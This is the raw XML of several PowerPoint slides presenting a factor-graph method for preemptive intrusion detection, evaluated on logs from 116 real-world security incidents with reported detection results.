      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533399" y="7364621"/>
            <a:ext cx="3811090" cy="647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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>State inference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Shape 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381135" y="8449290"/>
            <a:ext cx="1270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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2400" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354093" y="-544"/>
            <a:ext cx="13289281" cy="887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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5000"/>
              <a:t>Factor Graph Representation of an Example Incident</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="189" name="Group 189"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9713011" y="3803783"/>
            <a:ext cx="4477494" cy="4620052"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4477493" cy="4620051"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="187" name="image5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477494" cy="40043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8" name="Shape 188"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1147889" y="4034530"/>
              <a:ext cx="2181715" cy="5855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3200"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lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200"/>
                <a:t>Factor Graph</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Shape 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16317042" y="7159450"/>
            <a:ext cx="4902554" cy="1639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6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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="00206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factor functions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00206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/>
            </a:r>
            <a:br>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00206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</a:br>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="00206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197" name="Group 197"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6311974" y="9456475"/>
            <a:ext cx="9997226" cy="4255822"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9997224" cy="4255820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191" name="Shape 191"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2937822" y="3116018"/>
              <a:ext cx="4503286" cy="1106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l">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200" i="1"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Most probable s</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200" i="1" baseline="31999"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1</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200" i="1"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, s</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200" i="1" baseline="31999"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2 </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200" i="1"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is </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200" i="1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suspicious, malicious</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Shape 192"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2904880" y="346532"/>
              <a:ext cx="4569169" cy="11185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 algn="l">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200"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Score(s</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200" baseline="31999"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1</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200"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, s</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200" baseline="31999"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2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200"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) is the sum</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200"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of factor functions f</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="3200" baseline="-5999"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i</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="193" name="pasted-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892930" y="2002815"/>
              <a:ext cx="4902554" cy="5421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4" name="Shape 194"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2271193" y="0"/>
              <a:ext cx="6146028" cy="4255821"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId7">
                <a:alphaModFix amt="8981"/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63500" dist="127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0" y="2127910"/>
              <a:ext cx="980539" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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 flipH="1">
              <a:off x="9016686" y="2123304"/>
              <a:ext cx="980539" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Shape 198"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23925106" y="13212092"/>
            <a:ext cx="303445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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200"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fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr sz="2400" b="1"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr sz="2400" b="1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5926103" y="-38644"/>
            <a:ext cx="13256261" cy="887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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5000"/>
              <a:t>Real-world Measurements and Experimental Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20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200" y="8556420"/>
            <a:ext cx="12909612" cy="487391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>
            <a:off x="437480" y="1270000"/>
            <a:ext cx="10903013" cy="1531839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635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/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200"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Extract events and raw logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200"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from 116 real-world incidents (2008-2013)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437480" y="4037393"/>
            <a:ext cx="10903012" cy="1531839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635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For each user, construct a factor graph based on extracted events and user profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533399" y="6804786"/>
            <a:ext cx="10903013" cy="153184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635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200"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Perform inference on per-user factor graph using Gibbs sampling and output prediction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5668863" y="2976068"/>
            <a:ext cx="1" cy="887096"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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5668863" y="5743461"/>
            <a:ext cx="1" cy="887096"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13215338" y="1079983"/>
            <a:ext cx="10246924" cy="3975060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3607" b="1">
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Define security metrics for preemptive intrusion detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="753155" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3607">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Lamport detection timeliness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="753155" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3607">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Lamport preemption timeliness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="208" name="pasted-image.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:srcRect t="28407"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13838039" y="4415641"/>
            <a:ext cx="9001693" cy="2152366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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13418539" y="6154676"/>
            <a:ext cx="10246923" cy="3975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1" indent="753155" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3607"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lvl="0" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3607" b="1">
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Hypothesis testing to compare our approach with other rule-based approaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="753155" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3607">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>McNemar test in drug testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13380439" y="9005845"/>
            <a:ext cx="10731954" cy="4447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1" indent="633752" algn="l" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3243"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lvl="0" algn="l" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3243" b="1">
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Experimental result on 6-year security incident data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="633752" algn="l" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3243">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Identified 74% of attack in the testing set, most of them were detected before the attack payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="633752" algn="l" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3243">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Identified 6 hidden attacks that were not detected by security analysts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23933125" y="13175654"/>
            <a:ext cx="325091" cy="51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fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr sz="2400" b="1"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr sz="2400" b="1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0" y="3302000"/>
            <a:ext cx="11684000" cy="711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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11230893" y="-38644"/>
            <a:ext cx="2646681" cy="887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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5000"/>
              <a:t>Questions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Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>164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Consolas</vt:lpstr>
      <vt:lpstr>Droid Sans</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Bold Condensed</vt:lpstr>
      <vt:lpstr>Helvetica Neue Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue Medium</vt:lpstr>
      <vt:lpstr>Helvetica Neue Thin</vt:lpstr>
      <vt:lpstr>Helvetica Neue UltraLight</vt:lpstr>
      <vt:lpstr>White</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation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Clay, Amy Renee</dc:creator>
  <cp:lastModifiedBy>Clay, Amy Renee</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-05T15:03:45Z</dcterms:modified>
</cp:coreProperties>
</file>